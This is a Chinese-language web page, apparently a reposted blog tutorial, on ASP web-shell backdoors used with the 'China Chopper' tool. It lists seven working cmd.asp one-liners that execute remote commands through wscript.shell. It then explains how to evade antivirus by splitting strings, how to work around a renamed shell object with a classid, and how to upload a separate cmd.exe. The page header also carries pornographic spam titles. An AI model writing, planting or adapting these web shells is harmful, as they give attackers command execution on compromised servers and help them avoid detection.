压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

關于asp、php,jps一句話木馬--中國菜刀使用

  工具下載地址:http://pan.baidu.com/s/1o6jxAgq

  這里的asp后門不指像那些一句話木馬、砍客、冰狐、明小子之類的b/s型的,只指像cmd.asp或2005a.asp的。

  第一個,來看zzzeva免fso的cmd.asp

  代碼如下:<form method="post">

  <input type=text name="cmd" size=60>

  <input type=submit value="run"></form>

  <textarea readonly cols=80 rows=20>

  <%response.write server.createobject("wscript.shell").exec("cmd.exe /c

  "&request.form("cmd")).stdout.readall%>

  </textarea>

  是不是覺得有點長了?在黑客注入時寫有點不好寫。那來改一下。

  第二個,更改zzzeva免fso的cmd.asp

  代碼如下:

  <textarea readonly cols=80 rows=20>

  <%response.write server.createobject("wscript.shell").exec("cmd.exe /c

  "&request("cmd")).stdout.readall%>

  用法是xx.asp?cmd=net user

  這樣是為了得到結果排得方便,其實如果不為美觀,還可以更短,那來第三個

  第三個,縮短的cmd.asp

  <%response.write server.createobject("wscript.shell").exec("cmd.exe /c

  "&request("cmd")).stdout.readall%>

  這里用了response.write,變量用了cmd。為什么不更短呢?

  第四個,更短的cmd.asp

  <%=server.createobject("wscript.shell").exec("cmd.exe /c

  "&request("c")).stdout.readall%>

  好像這就是最短的了。除了短,我們還要在別的地方下功夫。

  第五個,wscript.shell被改名怎么辦?

  代碼:

  <ObjEct runat=sErvEr iD=kk scOpE=pagE

  classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>

  <%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

  當然,classid值在不同系統下有所不同。這個要自行更改

  第六個,被一些殺asp木馬的軟件檢測出來怎么辦?

  把變量拆開呀。代碼:

  <%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c

  "&request("c")).stdout.readall%>

  或

  <%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c

  "&request("c")).stdout.readall%>

  這里代碼引號里的東東都可以隨便拆的,像還可以拆成

  <%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c

  "&request("c")).stdout.readall%>

  第7個,cmd.exe不讓調用怎么辦?

  這個你自己上傳一個cmd.exe,放在一個可以調用的目錄下,代碼更改如下:

  <%=server.createobject("wscript.shell").exec("e:aspxcmD.EXE /c

  "&request("c")).stdout.readall%>

    文章來源:http://9738526.blog.51cto.com/9728526/1589937

上一篇:安卓防火墻 PS DroidWall

下一篇:Apache SSL單雙向證書認證